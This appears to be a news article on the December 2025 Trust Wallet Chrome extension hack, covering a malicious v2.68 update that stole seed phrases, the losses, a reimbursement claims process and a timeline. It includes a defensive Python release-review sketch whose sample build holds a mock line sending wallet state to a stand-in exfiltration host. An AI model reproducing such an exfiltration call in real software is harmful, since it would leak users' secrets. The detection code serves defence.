Trust Wallet is rolling out a full compensation program for users hit by a holiday-season Chrome extension hack that drained roughly $7 million in crypto. The Binance-backed company is promising 100% reimbursement for verified victims as scrutiny intensifies over browser-based wallet security.
The breach was highly targeted. Only users who interacted with Chrome extension version 2.68 between December 24 and December 26, 2025 were vulnerable. Trust Wallet’s mobile apps and non-Chrome browser users were unaffected.
But the fallout is significant: blockchain forensics show that attackers looted millions across Bitcoin, Ethereum, and Solana, moving more than $4 million through exchanges in rapid laundering cycles.
What Went Wrong
According to Trust Wallet, attackers used a leaked Chrome Web Store API key to upload a malicious update (v2.68) on December 24. The tainted build injected seed-phrase-stealing code via a modified analytics library, effectively intercepting users’ recovery phrases the moment they logged in.
By Christmas Day, reports of drained wallets reached on-chain analyst ZachXBT, who flagged the issue on Telegram. Trust Wallet scrambled to push a clean update (v2.69) on December 25 and told users to disable the compromised version immediately.
Security firms SlowMist and PeckShield say attackers may have prepared weeks earlier, citing a rogue domain registered on December 8. SlowMist labeled the breach “APT-level”—suggesting an unusually sophisticated actor or possible insider access. Even Binance co-founder Changpeng Zhao (CZ) speculated it was “most likely” an inside job, though investigations continue.
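A release gate aimed at this failure mode, a vendored library that starts talking to a new domain, can diff each candidate build against the last trusted release and block on unreviewed hosts. The sketch below is an added example, not code from Trust Wallet or the security firms cited; the file names, hostnames and allowlist are constructed placeholders.

```python
import re

# Hostnames that appear in URLs inside bundled JavaScript source.
HOST_RE = re.compile(r"https?://([a-z0-9.-]+\.[a-z]{2,})", re.I)

def hosts_in(files):
    """Map each hostname to the set of files that reference it."""
    found = {}
    for path, text in files.items():
        for host in HOST_RE.findall(text):
            found.setdefault(host.lower(), set()).add(path)
    return found

def review_release(previous, candidate, allowed_hosts):
    """Compare a candidate build with the last trusted release.

    Returns (changed_files, new_hosts): files added or modified, and
    hostnames present in the candidate that are neither in the previous
    build nor on the reviewed allowlist.
    """
    changed = sorted(p for p, t in candidate.items() if previous.get(p) != t)
    old = hosts_in(previous)
    new_hosts = {h: sorted(paths) for h, paths in hosts_in(candidate).items()
                 if h not in old and h not in allowed_hosts}
    return changed, new_hosts

# Constructed sample builds (file path -> source text); not real extension code.
BUILD_OLD = {
    "background.js": 'fetch("https://api.wallet.example/v1/prices");',
    "vendor/analytics.js": 'send("https://metrics.wallet.example/collect", evt);',
}
BUILD_NEW = {
    "background.js": 'fetch("https://api.wallet.example/v1/prices");',
    "vendor/analytics.js": 'send("https://metrics.wallet.example/collect", evt);'
                           'send("https://metrics-cdn.invalid/c", state);',
}
ALLOWED = {"api.wallet.example", "metrics.wallet.example"}

if __name__ == "__main__":
    changed, new_hosts = review_release(BUILD_OLD, BUILD_NEW, ALLOWED)
    print("changed files:", changed)
    for host, paths in new_hosts.items():
        print("BLOCK RELEASE: unreviewed host", host, "in", paths)
```

Plain string matching misses hosts that are assembled at runtime or obfuscated, so a check like this complements code review and publish-key controls rather than replacing them.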
The Damage
PeckShield estimates the stolen funds span:
- Bitcoin: ~$3M
- Ethereum & L2 tokens: $3M+
- Solana: ~$431K
Of the ~$7M total, more than $4.25M has already been laundered through ChangeNOW, HTX, FixedFloat, KuCoin, and other exchanges. Roughly $2.8M remains in attacker-controlled wallets.
This incident adds to more than $713M in wallet-related losses recorded in 2025, underscoring the growing security gaps in self-custody tools.
How Affected Users Can Claim Compensation
Trust Wallet has opened an official claims portal at:
trustwallet-support.freshdesk.com/support/tickets/new
Victims must provide:
- Email & country (for possible legal proceedings)
- Compromised wallet addresses
- Attacker wallet addresses
- Transaction hashes
- Estimated loss amount
- A fresh wallet address for reimbursement
The company says each case will undergo manual verification to prevent fraudulent claims and warns users to avoid impostor sites requesting seed phrases or passwords.
Trust Wallet’s Response, and CZ’s Assurance
Trust Wallet CEO Eowyn Chen acknowledged that the malicious upload bypassed internal safeguards and said the team is now implementing:
- Outside security audits
- Stricter internal access controls
- Quarterly third-party reviews
CZ reiterated that affected users’ funds are “SAFU,” referencing Binance’s history of covering over $1 billion in user losses during major incidents.
No exact payout timeline has been given, but Trust Wallet says its team is verifying claims “around the clock.”
Are Browser Wallets Too Risky?
The hack has reignited debate across X and Telegram about whether browser extensions, even from major brands, are fundamentally unsafe.
“Browser extensions are hack magnets,” one researcher wrote, calling for increased adoption of hardware wallets and multisig setups for high-value storage.
For others, Trust Wallet’s rapid reimbursement is a welcome precedent. But the broader takeaway is sobering: as crypto adoption accelerates, attackers are shifting from protocol exploits to software supply-chain attacks, often easier to execute and harder to detect.
Timeline of Events
- Dec 8, 2025: Rogue exfiltration domain registered.
- Dec 24, 12:32 p.m. UTC: Malicious v2.68 pushed to Chrome Web Store via leaked API key.
- Dec 25: Community reports; v2.69 safe version released.
- Dec 26, 11 a.m. UTC: Exposure window ends.
- Dec 26 (later): Forensics reveal >$4M laundered.
- Dec 27: Trust Wallet launches compensation program; CZ confirms full coverage.
What We Should Know
Trust Wallet’s reimbursement move may soften the blow, but the breach adds fuel to longstanding concerns over extension-based wallets. As 2026 approaches, wallet security, especially around supply-chain vulnerabilities, will likely define the next wave of crypto infrastructure debates.


